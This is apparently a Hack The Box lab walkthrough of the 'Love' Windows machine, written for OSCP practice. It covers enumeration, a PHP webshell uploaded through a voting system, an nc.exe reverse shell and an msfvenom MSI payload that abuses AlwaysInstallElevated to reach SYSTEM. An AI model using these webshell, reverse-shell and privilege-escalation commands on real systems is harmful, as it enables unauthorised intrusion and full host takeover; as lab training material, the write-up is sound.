In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap scan
# Nmap 7.94 scan initiated Mon Nov 6 05:58:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/results/10.10.10.239/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.239/scans/xml/_quick_tcp_nmap.xml 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up, received user-set (0.30s latency).
Scanned at 2023-11-06 05:58:42 EST for 94s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Voting System using PHP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in/organizationalUnitName=love.htb/[email protected]/localityName=norway
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in/organizationalUnitName=love.htb/[email protected]/localityName=norway
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0:1add:5048:afc8:b3cf:7140:6e68:5ff6
| SHA-1: 83ed:29c4:70f6:4036:a6f4:2d4d:4cf6:18a2:e9e4:96c2
| -----BEGIN CERTIFICATE-----
| MIIDozCCAosCFFhDHcnclWJmeuqOK/LQv3XDNEu4MA0GCSqGSIb3DQEBCwUAMIGN
| MQswCQYDVQQGEwJpbjEKMAgGA1UECAwBbTEPMA0GA1UEBwwGbm9yd2F5MRYwFAYD
| VQQKDA1WYWxlbnRpbmVDb3JwMREwDwYDVQQLDAhsb3ZlLmh0YjEZMBcGA1UEAwwQ
| c3RhZ2luZy5sb3ZlLmh0YjEbMBkGCSqGSIb3DQEJARYMcm95QGxvdmUuaHRiMB4X
| DTIxMDExODE0MDAxNloXDTIyMDExODE0MDAxNlowgY0xCzAJBgNVBAYTAmluMQow
| CAYDVQQIDAFtMQ8wDQYDVQQHDAZub3J3YXkxFjAUBgNVBAoMDVZhbGVudGluZUNv
| cnAxETAPBgNVBAsMCGxvdmUuaHRiMRkwFwYDVQQDDBBzdGFnaW5nLmxvdmUuaHRi
| MRswGQYJKoZIhvcNAQkBFgxyb3lAbG92ZS5odGIwggEiMA0GCSqGSIb3DQEBAQUA
| A4IBDwAwggEKAoIBAQDQlH1J/AwbEm2Hnh4Bizch08sUHlHg7vAMGEB14LPq9G20
| PL/6QmYxJOWBPjBWWywNYK3cPIFY8yUmYlLBiVI0piRfaSj7wTLW3GFSPhrpmfz0
| 0zJMKeyBOD0+1K9BxiUQNVyEnihsULZKLmZcF6LhOIhiONEL6mKKr2/mHLgfoR7U
| vM7OmmywdLRgLfXN2Cgpkv7ciEARU0phRq2p1s4W9Hn3XEU8iVqgfFXs/ZNyX3r8
| LtDiQUavwn2s+Hta0mslI0waTmyOsNrE4wgcdcF9kLK/9ttM1ugTJSQAQWbYo5LD
| 2bVw7JidPhX8mELviftIv5W1LguCb3uVb6ipfShxAgMBAAEwDQYJKoZIhvcNAQEL
| BQADggEBANB5x2U0QuQdc9niiW8XtGVqlUZOpmToxstBm4r0Djdqv/Z73I/qys0A
| y7crcy9dRO7M80Dnvj0ReGxoWN/95ZA4GSL8TUfIfXbonrCKFiXOOuS8jCzC9LWE
| nP4jUUlAOJv6uYDajoD3NfbhW8uBvopO+8nywbQdiffatKO35McSl7ukvIK+d7gz
| oool/rMp/fQ40A1nxVHeLPOexyB3YJIMAhm4NexfJ2TKxs10C+lJcuOxt7MhOk0h
| zSPL/pMbMouLTXnIsh4SdJEzEkNnuO69yQoN8XgjM7vHvZQIlzs1R5pk4WIgKHSZ
| 0drwvFE50xML9h2wrGh7L9/CSbhIhO8=
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
| mysql-info:
|_ MySQL Error: Host '10.10.14.8' is not allowed to connect to this MariaDB server
| fingerprint-strings:
| NULL, couchbase-data, dominoconsole, drda, gkrellm, informix, kumo-server, metasploit-msgrpc, metasploit-xmlrpc, minecraft-ping, mongodb, oracle-tns, riak-pbc, teamspeak-tcpquery-ver, tor-versions:
|_ Host '10.10.14.8' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94%I=9%D=11/6%Time=6548C6F1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-tns,49
SF:,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(dominoconsole,49,"
SF:E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(informix,49,"E\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(drda,49,"E\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.14\.8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\
SF:x20this\x20MariaDB\x20server")%r(gkrellm,49,"E\0\0\x01\xffj\x04Host\x20
SF:'10\.10\.14\.8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server")%r(metasploit-xmlrpc,49,"E\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.14\.8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20thi
SF:s\x20MariaDB\x20server")%r(mongodb,49,"E\0\0\x01\xffj\x04Host\x20'10\.1
SF:0\.14\.8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mar
SF:iaDB\x20server")%r(riak-pbc,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.
SF:8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x2
SF:0server")%r(couchbase-data,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8
SF:'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20
SF:server")%r(kumo-server,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x2
SF:0is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serv
SF:er")%r(metasploit-msgrpc,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\
SF:x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20se
SF:rver")%r(minecraft-ping,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x
SF:20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20ser
SF:ver")%r(teamspeak-tcpquery-ver,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.1
SF:4\.8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB
SF:\x20server")%r(tor-versions,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.
SF:8'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x2
SF:0server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46453/tcp): CLEAN (Couldn't connect)
| Check 2 (port 29697/tcp): CLEAN (Couldn't connect)
| Check 3 (port 21885/udp): CLEAN (Failed to receive data)
| Check 4 (port 56070/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 21m32s, deviation: 0s, median: 21m32s
| smb2-time:
| date: 2023-11-06T11:21:36
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 6 06:00:16 2023 -- 1 IP address (1 host up) scanned in 101.45 seconds
there is a subdomain called staging.love.htb. we add this to the etc/hosts
when we enumerate this folder we find a place where you can scan a file
After looking around we chek with local host and port 5000
We see a username and password exposed
Vote Admin Creds admin: @LoveIsInTheAir!!!!
we login with this credentials
After loging in, there is a place we can upload a photo. I will try and upload a shell i have created with msfvenom
After uploading this we can access this in — http://10.10.10.239/images/ which we enumerated with dirb
we create a simple php to test whoami
<?php
system('cmd.exe /c whoami');
?>
we run and get
love\phoebe
to check the working directory
<?php
system('cmd.exe /c cd');
?>
working directory
C:\xampp\htdocs\omrs\images
We upload nc.exe then we upload the following php
GNU nano 7.2 test2.php *
<?php
system('cmd.exe /c C:/xampp/htdocs/omrs/images/nc.exe 10.10.14.16 444 -e cmd.exe');
?>
we get a reverseshell
╭─kali@kali ~/HTB/love
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.239] 49691
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
flag
C:\Users\Phoebe\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
11/07/2023 05:01 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4,165,361,664 bytes free
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
c04a691b061dd2dcdefda7ce1cba0a28
C:\Users\Phoebe\Desktop>
privesc
systeminfo
C:\xampp\htdocs\omrs\images>systeminfo
systeminfo
Host Name: LOVE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: roy
Registered Organization:
Product ID: 00330-80112-18556-AA148
Original Install Date: 4/12/2021, 12:14:12 PM
System Boot Time: 11/7/2023, 5:00:32 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,678 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,335 MB
Virtual Memory: In Use: 1,464 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\LOVE
Hotfix(s): 9 Hotfix(s) Installed.
[01]: KB4601554
[02]: KB4562830
[03]: KB4570334
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB5000802
[09]: KB5000858
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.239
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
output the file to txt and check with windowsexploit checker
─kali@kali ~/HTB/love/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 9 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical
[*] https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
[*] https://github.com/theori-io/chakra-2016-11
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[*] done
We will try https://www.exploit-db.com/exploits/39719 which is powershell
We download and serve this file
╭─kali@kali ~/HTB/love
╰─$ wget https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
--2023-11-07 17:03:07-- https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11460 (11K) [text/plain]
Saving to: ‘Invoke-MS16-032.ps1’
Invoke-MS16-032.ps1 100%[===========================================>] 11.19K --.-KB/s in 0.001s
2023-11-07 17:03:08 (12.5 MB/s) - ‘Invoke-MS16-032.ps1’ saved [11460/11460]
╭─kali@kali ~/HTB/love
╰─$ ls
10.10.10.239 39719.ps1 exploit.php shell.php test2.php test.php
10.10.10.95 exploit.exe Invoke-MS16-032.ps1 test1.php test3.php Windows-Exploit-Suggester
╭─kali@kali ~/HTB/love
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
Copy it to the machine and run it but no luck
PS C:\temp> .\Invoke-MS16-032.ps1
.\Invoke-MS16-032.ps1
PS C:\temp> whoami
whoami
love\phoebe
PS C:\temp>
Trying winpeas. serving, uploading and running
curl http://10.10.14.16:900/winPEASx64.exe -o winPEASx64.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2332k 100 2332k 0 0 777k 0 0:00:03 0:00:03 --:--:-- 632k
C:\temp>
but before reading winpeas output il try looking at the MS16–032 again. after reading a PoC here — https://pentestlab.blog/tag/ms16-032/
tried this but failed
PS C:\temp> import-Module ./39719.ps1
import-Module ./39719.ps1
PS C:\temp> Invoke-MS16-032
Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[!] No valid thread handle was captured, exiting!
PS C:\temp>
researched a modified one here.will try and if not working il get out of rabbit hole and try winpeas — https://gist.github.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980
Trying MS16–098
╭─kali@kali ~/HTB/love
╰─$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe 1 ↵
--2023-11-07 18:27:19-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-11-07 18:27:20 ERROR 404: Not Found.
╭─kali@kali ~/HTB/love
╰─$ cp ~/Downloads/bfill.exe ~/HTB/love 8 ↵
╭─kali@kali ~/HTB/love
╰─$
on the windows it doesnt work
C:\temp>bfill.exe
bfill.exe
whoami
[+] Trigerring Exploit.
Done filling.
[!] FillPath() Failed: 58a
GetBitmapBits failed. 6
GetBitmapBits failed. 6
GetBitmapBits failed. 6
GetBitmapBits failed. 6
C:\temp>bfill.exe
bfill.exe
Back to winpeas but will run sequntially so that i am not overewhemed. The flags are;
winpeas.exe -h # Get Help
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
winpeas.exe notcolor #Do not color the output
winpeas.exe domain #enumerate also domain information
winpeas.exe wait #wait for user input between tests
winpeas.exe debug #display additional debug information
winpeas.exe log #log output to out.txt instead of standard output
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
winpeas.exe -lolbas #Execute also additional LOLBAS search check
starting with systeminfo and from checking this article — https://juggernaut-sec.com/alwaysinstallelevated/#Manually_Enumerating_AlwaysInstallElevated
AlwaysInstallElevated is a functionality that offers ALL users on a Windows operating system the ability to automatically run any **MSI** file with elevated privileges.
from winpeas
� https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system isn't inside a domain, so it isn't vulnerable
���������� Checking If Inside Container
� If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
���������� Checking AlwaysInstallElevated
� https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
���������� Enumerate LSA settings - auth packages included
creating a reverse shell with msfvenom and serving it
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 -a x64 --platform windows LPORT=4444 -f msi > exploit.msi
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
copy the exploit across
C:\temp>curl http://10.10.14.16:900/exploit.msi -o exploit.msi
curl http://10.10.14.16:900/exploit.msi -o exploit.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 0:00:01 --:--:-- 100k
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\temp
11/07/2023 05:15 PM <DIR> .
11/07/2023 05:15 PM <DIR> ..
09/15/2015 07:08 AM <DIR> 38202
11/07/2023 07:03 AM 100,613 38202.zip
11/07/2023 03:53 PM 11,829 39719.ps1
11/07/2023 04:52 PM 560,128 bfill.exe
11/07/2023 05:15 PM 159,744 exploit.msi
11/07/2023 03:27 PM 11,460 Invoke-MS16-032.ps1
11/07/2023 03:58 PM 13,929 Modified-MS16-032.ps1
11/07/2023 03:39 PM 2,387,968 winPEASx64.exe
7 File(s) 3,245,671 bytes
3 Dir(s) 4,104,433,664 bytes free
C:\temp>
set up listener on 4444 and run the exploit
C:\temp>exploit.msi
exploit.msi
C:\temp>
╭─kali@kali ~/HTB/love
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.239] 49727
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>cd users
cd users
C:\Users>cd desktop
cd desktop
The system cannot find the path specified.
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c6273054980087bc56d61b062d24555e
C:\Users\Administrator\Desktop>